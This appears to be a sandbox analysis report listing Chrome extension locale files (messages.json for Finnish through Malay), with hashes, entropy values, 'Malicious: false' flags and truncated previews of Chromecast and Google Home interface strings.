C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\fi\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15268
Entropy (8bit):	5.268402902466895
Encrypted:	false
SSDEEP:	192:efMprYXiYUNpj5Coik1tXxrUhvUzSPWV6c8TEKdl:eIrjbjosdrU5WV6uml
MD5:	3902581B6170D0CEA9B1ECF6CC82D669
SHA1:	C8208AC2B1DD6D4F8BDAAE01C8BD71FFFA5A732B
SHA-256:	D2A8180225A83A423BB6E17343DFA8F636D517154944002ED9240411B8C0C5E1
SHA-512:	612FDD8A3C5051F0A4F1E11E50B5D124B337C77D62D987D35C2AF9E08AFC6AFCEBAEE8D40FDFBCD1E1889F39758B96FAECBF6C6D1CF146C741A5261952050221
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Pys.htyy".. },.. "1213957982723875920": {.. "message": "Mik. seuraavista kuvaa parhaiten verkkoasi?".. },.. "128276876460319075": {.. "message": "Laitteiden tunnistaminen".. },.. "1428448869078126731": {.. "message": "Videon tasaisuus".. },.. "1522140683318860351": {.. "message": "Yhteys ep.onnistui. Yrit. uudelleen.".. },.. "1550904064710828958": {.. "message": "Tasainen".. },.. "1636686747687494376": {.. "message": "T.ydellinen".. },.. "1802762746589457177": {.. "message": "..nenvoimakkuus".. },.. "1850397500312020388": {.. "message": "N.etk. Chromecastisi $START_LINK$Google Home .sovelluksessa$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\fil\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15570
Entropy (8bit):	5.1924418176212646
Encrypted:	false
SSDEEP:	192:+esprzAsQp68wIJYkMyr2k0jR1/7Rr1uV6c8TEKdl:Gr78JDMyrR0tJuV6uml
MD5:	59483AD798347B291363327D446FA107
SHA1:	C069F29BB68FA7BA2631B0BF5BBF313346AC6736
SHA-256:	DD47530EAE96346CD4DC3267A0BB1091BB17B704803A93CDA2E3E81551B94F12
SHA-512:	091595CA135E965ED3DE376873541117F0E7A8EBDEB4714833EFDD6C820234373891BE5DEC437BA85CCB79CCCA053D407E6ADA17EBDAE7D313324A48775C0010
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Hindi gumagalaw".. },.. "1213957982723875920": {.. "message": "Alin sa sumusunod ang pinakamahusay na naglalarawan sa iyong network?".. },.. "128276876460319075": {.. "message": "Pagtuklas ng Device".. },.. "1428448869078126731": {.. "message": "Pagka-smooth ng Video".. },.. "1522140683318860351": {.. "message": "Hindi nakakonekta. Pakisubukang muli.".. },.. "1550904064710828958": {.. "message": "Smooth".. },.. "1636686747687494376": {.. "message": "Perpekto".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Nakikita mo ba ang iyong Chromecast sa $START_LINK$ Google Home app$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\fr\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15826
Entropy (8bit):	5.277877116547859
Encrypted:	false
SSDEEP:	192:nLZprAZg3EkV3sjrICe8L/1Va7lt1rlxLAkoYHHavV6c8TEKdl:vrW+2jrI7TdLAk3MV6uml
MD5:	9B416146FE4F1403C2AACAC4DCF1A5C3
SHA1:	616F055C9FAD4CE972DF82EC8A9B2F4EDA3E7FAD
SHA-256:	7C7F5758F54008190ACCDDBD1761CBD980FB5FE0847E992874498228D2571DBC
SHA-512:	6E8E70380A8C6E2C0587ADFF6AE36963EC76694904841CE1DFE4EEE215B917AD3E8AF727555627FBDF6B8BA6A4A0674D2B90AC4E9331B6628A32F4C4348FB51B
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Se fige".. },.. "1213957982723875920": {.. "message": "Parmi les propositions suivantes, laquelle d.crit le mieux votre r.seau.?".. },.. "128276876460319075": {.. "message": "D.tection d'appareils".. },.. "1428448869078126731": {.. "message": "Fluidit. de la vid.o".. },.. "1522140683318860351": {.. "message": ".chec de la connexion. Veuillez r.essayer.".. },.. "1550904064710828958": {.. "message": "Fluide".. },.. "1636686747687494376": {.. "message": "Parfaite".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Votre Chromecast est-il visible dans l'$START_LINK$application Google.Home$END_LINK$.? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\gu\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	19255
Entropy (8bit):	5.32628732852814
Encrypted:	false
SSDEEP:	384:Hq2Mr+qPlJKYMdzKgXr3dGsGF+yAK37Wf7Cy/V6uml:KxzTVgX7ykj6uml
MD5:	68B03519786F71A426BAC24DECA2DD52
SHA1:	B8E6608932EC5CEC4BC3C5475BFC3E312D2E2E7D
SHA-256:	C77A4D27E9E6CA25B9290056D93A656E3EBE975957E4C2EE9F0FB11B133D5CD4
SHA-512:	5FFE06A10774877AF25E05BA07F3032CC52F874896D67E320F4EF9D524A22E40B462CC6206700E9557EB354FA2730172DC6912EBCA49C671FB0EF155B17F9EFF
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": ".....".. },.. "1213957982723875920": {.. "message": "........... .... ..... .......... ....... ..... ... ..?".. },.. "128276876460319075": {.. "message": "..... ...".. },.. "1428448869078126731": {.. "message": "........ ......".. },.. "1522140683318860351": {.. "message": "....... ...... ..... .... ..... ..... ...... ....".. },.. "1550904064710828958": {.. "message": "....".. },.. "1636686747687494376": {.. "message": ".....".. },.. "1802762746589457177": {.. "message": ".......".. },.. "1850397500312020388": {.. "message": "... ... $START_LINK$ Google Home ..$END_LINK$... Chromecast..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\hi\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	19381
Entropy (8bit):	5.328912995891658
Encrypted:	false
SSDEEP:	384:zrGrSmhKy7KyY+bNEDqlQdrMEPxtShJV6uml:zBqG6QdwEPrW6uml
MD5:	20C86E04B1833EA7F21C07361061420A
SHA1:	617C0D70E162CF380005E9780B61F650B7A39F9B
SHA-256:	C2C27CA242DBDE600BA3AA7782156BC2B190A64D8A1B51EDC8007BDECA139553
SHA-512:	9FB91AA8E0226519E298B1136E8A1A3C1879DB7F0E6052AF1BFD55921CD698346278D04602510680A9695A76DD5C96D9665380580044C50D81392BB2CB3E8E95
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": ".....".. },.. "1213957982723875920": {.. "message": "..... ... .. ... .... ....... .. .... ..... ..... .... ..?".. },.. "128276876460319075": {.. "message": "...... ...".. },.. "1428448869078126731": {.. "message": "...... .........".. },.. "1522140683318860351": {.. "message": "....... ..... ..... .... ...... .....".. },.. "1550904064710828958": {.. "message": ".......".. },.. "1636686747687494376": {.. "message": ".....".. },.. "1802762746589457177": {.. "message": ".....".. },.. "1850397500312020388": {.. "message": ".... .. $START_LINK$ Google Home .........$END_LINK$ ... .... Ch

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\hr\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15507
Entropy (8bit):	5.290847699527565
Encrypted:	false
SSDEEP:	192:Pdapr6h85tRwVQgkvJryLkla5Kfndg/V6c8TEKdl:Arwot2Q7BryVce/V6uml
MD5:	3ED90E66789927D80B42346BB431431E
SHA1:	2B061E3271DF4255B1FFC47BDB207CDEC0D9724F
SHA-256:	0B41E3C42414F72C9A12C05F8772597F9685115366A774C66018467AD4B71A74
SHA-512:	92BE43F1FFC8EFBF5BBC50573AC4C65F6104416A5B6CD04404C3A9854CA3DCF2A43A4044C168590CDF83887D234495843572331ADCD5B020D2E48A3956F3C164
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Zamrzavanje".. },.. "1213957982723875920": {.. "message": "Koje od sljede.eg najbolje opisuje va.u mre.u?".. },.. "128276876460319075": {.. "message": "Otkrivanje ure.aja".. },.. "1428448869078126731": {.. "message": "Ujedna.enost videoreprodukcije".. },.. "1522140683318860351": {.. "message": "Povezivanje nije uspjelo. Poku.ajte ponovo.".. },.. "1550904064710828958": {.. "message": "Glatko".. },.. "1636686747687494376": {.. "message": "Savr.ena".. },.. "1802762746589457177": {.. "message": "Glasno.a".. },.. "1850397500312020388": {.. "message": "Vidite li svoj Chromecast u $START_LINK$aplikaciji Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3"..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\hu\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15682
Entropy (8bit):	5.354505633120392
Encrypted:	false
SSDEEP:	192:CCEAproS9fZv+JwkDMrC2NSxoSgbV6c8TEKdl:5r5VZv+RDMrazoV6uml
MD5:	8E9FF7E49473C5734A2F6F0812E12EB3
SHA1:	A4F10DDD1580582533D5EB59EDF6D8048F887C81
SHA-256:	6CDD2FB39ADECE00E88B989E464B05ED1414092D0492F6D0AE58D549BFD1A46A
SHA-512:	E9A4AF31B1A276F395599BB620A3164CABF3459F3C102DD3F57DFEA734510BD985DE65CB409E1975559ACCC615075439A08E1DEBE22C90A0ABCAA3CAFEE79AC7
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Lefagy".. },.. "1213957982723875920": {.. "message": "Az al.bbiak k.z.l melyik jellemzi legjobban h.l.zat.t?".. },.. "128276876460319075": {.. "message": "Eszk.zfelfedez.s".. },.. "1428448869078126731": {.. "message": "Vide. folyamatoss.ga".. },.. "1522140683318860351": {.. "message": "Sikertelen kapcsol.d.s. K.rj.k, pr.b.lja .jra.".. },.. "1550904064710828958": {.. "message": "Folyamatos".. },.. "1636686747687494376": {.. "message": "T.k.letes".. },.. "1802762746589457177": {.. "message": "Hanger.".. },.. "1850397500312020388": {.. "message": "L.tja a Chromecastot a $START_LINK$Google Home alkalmaz.sban$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content":

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\id\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15070
Entropy (8bit):	5.190057470347349
Encrypted:	false
SSDEEP:	192:GsprMtChjkWfrEWL0KRCnEOWV6c8TEKdl:9rtAEr3LTRuWV6uml
MD5:	7ADF9F2048944821F93879336EB61A78
SHA1:	C3DA74FB544684D5B250767BB0CB66FFB7C58963
SHA-256:	3630947E1075E3663AD3E4824D0BE42CB47C0D615D8053E83B9595047C8BA9BE
SHA-512:	1F28BB80E1839C5581106BEA3AE2501C7618249D7E3115819F5A9A87771D59F5DE346C1B9C87F7FFC390604D5B9888CE738E25F2F04A094002A0FB3B22CBEC95
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Membeku".. },.. "1213957982723875920": {.. "message": "Dari berikut ini, manakah yang paling mendeskripsikan jaringan Anda?".. },.. "128276876460319075": {.. "message": "Penemuan Perangkat".. },.. "1428448869078126731": {.. "message": "Kelancaran Video".. },.. "1522140683318860351": {.. "message": "Sambungan gagal. Coba lagi.".. },.. "1550904064710828958": {.. "message": "Lancar".. },.. "1636686747687494376": {.. "message": "Sempurna".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Bisakah Anda melihat Chromecast di $START_LINK$aplikasi Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\it\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15256
Entropy (8bit):	5.210663765771143
Encrypted:	false
SSDEEP:	192:lYprk52dAaykVza8rE0QWBKD9+vq0hKEV6c8TEKdl:qrlA8r6DalV6uml
MD5:	BB3041A2B485B900F623E57459AE698A
SHA1:	502F5EA89F9FB0287E864B240EA39889D72053A4
SHA-256:	025737EF8FA06706B3F26D0F52B4844244A6D33DAE1D82FEF2931A14C003D57E
SHA-512:	BA51784073BEF82F3A116B33DA406FDB10EC823B9EE74375C46036DAD8BDCB4141F60845DE141ABE42CEEF9251572F6AB287CA5FC7669C60E4F68071D5AB8C2D
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Si blocca".. },.. "1213957982723875920": {.. "message": "Quale delle seguenti definizioni descrive meglio la tua rete?".. },.. "128276876460319075": {.. "message": "Rilevamento dispositivi".. },.. "1428448869078126731": {.. "message": "Uniformit. video".. },.. "1522140683318860351": {.. "message": "Connessione non riuscita. Riprova.".. },.. "1550904064710828958": {.. "message": "Fluido".. },.. "1636686747687494376": {.. "message": "Perfetta".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Riesci a vedere il tuo dispositivo Chromecast nell'$START_LINK$app Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3"..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\iw\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	18990
Entropy (8bit):	4.903564947699091
Encrypted:	false
SSDEEP:	192:xkQ0XrEGOhGUkT/Mf8eZrNj27tS+iiUfOkGEyWiycLSK8eL+D75J4X:KdrgGvDMEeZrM78fQVLZqDA
MD5:	A991BEF47A83913A1E0EF06007D09198
SHA1:	80BA1E8FC3E9BE8A34F73E78CED8313E54F9CC96
SHA-256:	0F95D8BF550F14B2B704CE42911F5BD23FA9FE28D0D301F66628848B27C760CB
SHA-512:	1B5C8196669088A884FD8E117E7EB0870B296AF493004F948D0AD4FF630B07A34F423647E55856307029B2B06CDCCEAED2F9C43B426200D28D8A19A48CEA5D42
Malicious:	false
Preview:	{"1018984561488520517": {"message": "\u05e7\u05d5\u05e4\u05d0"}, "1213957982723875920": {"message": "\u05d0\u05d9\u05d6\u05d4 \u05de\u05d4\u05de\u05e9\u05e4\u05d8\u05d9\u05dd \u05d4\u05d1\u05d0\u05d9\u05dd \u05de\u05ea\u05d0\u05e8 \u05d0\u05ea \u05d4\u05e8\u05e9\u05ea \u05e9\u05dc\u05da \u05d1\u05e6\u05d5\u05e8\u05d4 \u05d4\u05d8\u05d5\u05d1\u05d4 \u05d1\u05d9\u05d5\u05ea\u05e8?"}, "128276876460319075": {"message": "\u05d2\u05d9\u05dc\u05d5\u05d9 \u05de\u05db\u05e9\u05d9\u05e8\u05d9\u05dd"}, "1428448869078126731": {"message": "\u05d0\u05d9\u05db\u05d5\u05ea \u05d4\u05e2\u05d1\u05e8\u05ea \u05d4\u05d5\u05d5\u05d9\u05d3\u05d0\u05d5"}, "1522140683318860351": {"message": "\u05d4\u05d7\u05d9\u05d1\u05d5\u05e8 \u05e0\u05db\u05e9\u05dc. \u05e0\u05e1\u05d4 \u05e9\u05d5\u05d1."}, "1550904064710828958": {"message": "\u05d7\u05dc\u05e7"}, "1636686747687494376": {"message": "\u05de\u05e2\u05d5\u05dc\u05d4"}, "1802762746589457177": {"message": "\u05e2\u05d5\u05e6\u05de\u05ea \u05e7\u05d5\u05dc"}, "

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\ja\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	16519
Entropy (8bit):	5.675556017051063
Encrypted:	false
SSDEEP:	192:nkprPhQdxkRWrZe1wYpMR5wnAV6c8TEKdl:YrLRWri65wAV6uml
MD5:	6F2CC1A6B258DF45F519BA24149FABDC
SHA1:	8A58C7880C6D22765DCBB6BCE22A192C1B109AE1
SHA-256:	42ECFEE727CFC4F2845FEFDACE5EDC2E0A40AFAD69973A3B950CE653A7633342
SHA-512:	F7454F0E14301C59CC54361ACC0A1C6D072EF9BDF5DEA60646FB90B1CE47612785938C784A4CF1DE3E62648A14420374933B5F5DA43907BC00D3799FF163A3D0
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "...".. },.. "1213957982723875920": {.. "message": "................................".. },.. "128276876460319075": {.. "message": "......".. },.. "1428448869078126731": {.. "message": ".......".. },.. "1522140683318860351": {.. "message": ".......................".. },.. "1550904064710828958": {.. "message": "...".. },.. "1636686747687494376": {.. "message": "....".. },.. "1802762746589457177": {.. "message": "..".. },.. "1850397500312020388": {.. "message": "$START_LINK$Google Home ...$END_LINK$. Chromecast .........$START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\kn\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	20406
Entropy (8bit):	5.312117131662377
Encrypted:	false
SSDEEP:	384:a6C5rBSzvrZreGnla9ZBHRUDYr9yRwEcAa4rSeD5BSz0hJz8qbbM3gbr//Hkr44c:a6C5rBSzvFreGnla9ZBHRUDYr9yRwEcC
MD5:	2E3239FC277287810BC88D93A6691B09
SHA1:	FC5D585DA00ADC90BF79109C7377BD55E6653569
SHA-256:	5FC705AD19761204D8604EA069936A23731B055D51E7836CAAF16AC7719FBEEA
SHA-512:	DF8BC9E577D3ECB0E6C303E1D2C9E9A4A8317CAE810A9DFC88D91B373A4B665722C5A9AB5A589BB947FDA4C7CD9A6DF39DDD13EA47FE9EFF7E0AC43E49FF3479
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "....... .........".. },.. "1213957982723875920": {.. "message": "...... ...... ..... ........... ..... ......... ............?".. },.. "128276876460319075": {.. "message": "..... ........".. },.. "1428448869078126731": {.. "message": "........ .......".. },.. "1522140683318860351": {.. "message": "...... ........... ........ ..... ...........".. },.. "1550904064710828958": {.. "message": ".....".. },.. "1636686747687494376": {.. "message": ".....".. },.. "1802762746589457177": {.. "message": "........".. },.. "1850397500312020388": {.. "message": ".... $

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\ko\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	15480
Entropy (8bit):	5.617756574352461
Encrypted:	false
SSDEEP:	192:kWprGvSQtkxWffrnl5JuFBWVZV6c8TEKdl:TrkuxKfrlT4YVZV6uml
MD5:	E303CD63AD00EB3154431DED78E871C4
SHA1:	3B1E5B8E2CF5EBDF5D33656EF80A46563F751783
SHA-256:	FDE602BFDB1AFD282682DA5338C4F91D8A2F6CB5411DB8F62F4583D629CE67A6
SHA-512:	18BA1D5A25FBC1829AD957A531B0CC490AFCBD20AC22181021363AA3CFB916270B8732E824463C9B0897220E8AE86EB1BE561D6540E6C625F08F228F61DDFFA3
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "...".. },.. "1213957982723875920": {.. "message": ".. . .. .. ..... .. . .... ... .....?".. },.. "128276876460319075": {.. "message": ".. ..".. },.. "1428448869078126731": {.. "message": "... ..".. },.. "1522140683318860351": {.. "message": ".... ...... .. ... ....".. },.. "1550904064710828958": {.. "message": "...".. },.. "1636686747687494376": {.. "message": "...".. },.. "1802762746589457177": {.. "message": "..".. },.. "1850397500312020388": {.. "message": "$START_LINK$Google Home .$END_LINK$. Chromecast. .....? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\lt\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15802
Entropy (8bit):	5.354550839818046
Encrypted:	false
SSDEEP:	192:lGxSprfkiRR+2zJckS1khrnPI85+80p3DWReV6c8TEKdl:lG4rlq0OkSmhrwbpIeV6uml
MD5:	93BBBE82F024FBCB7FB18E203F253429
SHA1:	83F4D80F64FA2ADCE6C515C5F663BD38A76C51DB
SHA-256:	E7A8570922CCC4F2CA3721C4E61F426158C4E7BC90274FBC8BE4040FF8B6CA9B
SHA-512:	B7E7878106B466CE95069141DF1DE387E847348B62E9C4D548006452F3E164B3AD842E9673A56DC011A5ECC3346B5863E2034EE477A9D1F3E0ABD76B2D0F640A
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Stringa".. },.. "1213957982723875920": {.. "message": "Kuris i. toliau pateikt. teigini. geriausiai apib.dina j.s. tinkl.?".. },.. "128276876460319075": {.. "message": ".renginio suradimas".. },.. "1428448869078126731": {.. "message": "Vaizdo .ra.o sklandumas".. },.. "1522140683318860351": {.. "message": ".vyko ry.io klaida. Bandykite dar kart..".. },.. "1550904064710828958": {.. "message": "Leid.iama skland.iai".. },.. "1636686747687494376": {.. "message": "Puiki".. },.. "1802762746589457177": {.. "message": "Garsumas".. },.. "1850397500312020388": {.. "message": "Ar .Chromecast. rodomas $START_LINK$programoje .Google Home.$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\lv\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15891
Entropy (8bit):	5.36794040601742
Encrypted:	false
SSDEEP:	192:y18prUkm15wkLDG2raqhnZDuvyI762V6c8TEKdl:RrAL7rte62V6uml
MD5:	388590CE5E144AE5467FD6585073BD11
SHA1:	61228673A400A98D5834389C06127589F19D3A30
SHA-256:	05CA14196CA5D90B228C0F03684E03EBE403A3E7B513AE0A059244AE12B51164
SHA-512:	BF83AC90BC56CEB1CA12DCB47BCE542FB8CFE0BC14E34DE4FE1A84F7CDB4B54E36C125CEA7EE06EA6244F7795A0957A8A20DB30CA4C60FC6E96EF2A735448521
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": ".Iesald.ts. att.ls".. },.. "1213957982723875920": {.. "message": "Kur. no t.l.k min.tajiem apgalvojumiem vislab.k raksturo j.su t.klu?".. },.. "128276876460319075": {.. "message": "Ier.ces atra.ana".. },.. "1428448869078126731": {.. "message": "Video vienm.r.ba".. },.. "1522140683318860351": {.. "message": "Neizdev.s izveidot savienojumu. L.dzu, m..iniet v.lreiz.".. },.. "1550904064710828958": {.. "message": "Vienm.r.gs att.ls".. },.. "1636686747687494376": {.. "message": "Nevainojama".. },.. "1802762746589457177": {.. "message": "Ska.ums".. },.. "1850397500312020388": {.. "message": "Vai j.su Chromecast ier.ce ir redzama $START_LINK$lietotn. Google.Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2"..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\ml\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	20986
Entropy (8bit):	5.347122984404251
Encrypted:	false
SSDEEP:	384:6pQrdbhWHZ3wOn1HbxytQdroExFVRnTPV6uml:X5hUtz6uml
MD5:	2AF93901DE80CA49DA869188BCDA9495
SHA1:	E60DF4F2FB12BD3F1CA869DAD9F6BDE0C17CEB11
SHA-256:	329E80AEE1212F634E180DEF7E16D6E38D9C9FDA9AC9DB1D99B8AE1626EF304E
SHA-512:	DD1711B017DC65E1272972A1BEBD7A1B1769E1F22B37B20582573392CD432725D19DCE134145B3C031428BC0B5948B02A9AA93C8A651BEAA189B686B7BC2AD46
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "...........".. },.. "1213957982723875920": {.. "message": "................ ..... ....... ...... ....... ......... ............. .................?".. },.. "128276876460319075": {.. "message": "...... .........".. },.. "1428448869078126731": {.. "message": "...... ...............".. },.. "1522140683318860351": {.. "message": "...... .............. ....... ...........".. },.. "1550904064710828958": {.. "message": ".........".. },.. "1636686747687494376": {.. "message": "........".. },.. "1802762746589457177": {.. "message"

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\mr\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	19628
Entropy (8bit):	5.311054092888986
Encrypted:	false
SSDEEP:	192:PbrpprGy+RmIosTmidpzlF1Akk03LQYOkQrjNjP8hZYiEQ5z+excV6c8TEKdl:PbfrGUIos7dpzxbP7KrjNjaBEYuV6uml
MD5:	659F5B4ACA112D3ECBB6EC1613DDE824
SHA1:	5DEE35FCD260554999F8DDEC489FBA9F81FA8EEE
SHA-256:	C8B765E7A07578BC078A952E151E3B866506959E15E79E9E5E1DBB98F9C4008F
SHA-512:	F74B36C1B6160E444F4969D13788A9C60637BDC11DC5065B2518B668E8D638384E00557ACDC88B3EA225D9231B6BED4B227BFB2E12C92773073B256F62ADDE63
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "......".. },.. "1213957982723875920": {.. "message": "......... ..... ...... ......... ............ ..... ....?".. },.. "128276876460319075": {.. "message": "........ ...".. },.. "1428448869078126731": {.. "message": "....... .......".. },.. "1522140683318860351": {.. "message": "....... ....... ..... ..... ...... ....... ....".. },.. "1550904064710828958": {.. "message": ".... ..... .....".. },.. "1636686747687494376": {.. "message": "....".. },.. "1802762746589457177": {.. "message": ".........".. },.. "1850397500312020388": {.. "message": "...... $START_LINK$ Goo

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\ms\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15330
Entropy (8bit):	5.193447909498091
Encrypted:	false
SSDEEP:	192:rCprBbx+Fkc4kYPr/pEt4EpXlIoV6c8TEKdl:CrYjer/mOE4oV6uml
MD5:	09D75141E0D80FBD3E9E92CE843DA986
SHA1:	B24EAB4B1242C31B69514D77BC1DB36A3F648F40
SHA-256:	8F1DBDEFD910AD88BEEC7956619CDB34391D6E69254C3A7497E8F87134AE8B5C
SHA-512:	935C69481F1555787FCB9A5490B3188B348284B600359239742A7D802ADD5CC8A30CC1F0942D52E620DFB388787FCD69B548BBAC590110245DF5763367A2DD5A
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Tidak bergerak".. },.. "1213957982723875920": {.. "message": "Antara yang berikut, manakah yang terbaik menggambarkan rangkaian anda?".. },.. "128276876460319075": {.. "message": "Penemuan Peranti".. },.. "1428448869078126731": {.. "message": "Kelancaran Video".. },.. "1522140683318860351": {.. "message": "Sambungan gagal. Sila cuba lagi.".. },.. "1550904064710828958": {.. "message": "Lancar".. },.. "1636686747687494376": {.. "message": "Sempurna".. },.. "1802762746589457177": {.. "message": "Kelantangan".. },.. "1850397500312020388": {.. "message": "Adakah anda dapat melihat Chromecast anda dalam $START_LINK$ apl Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content":

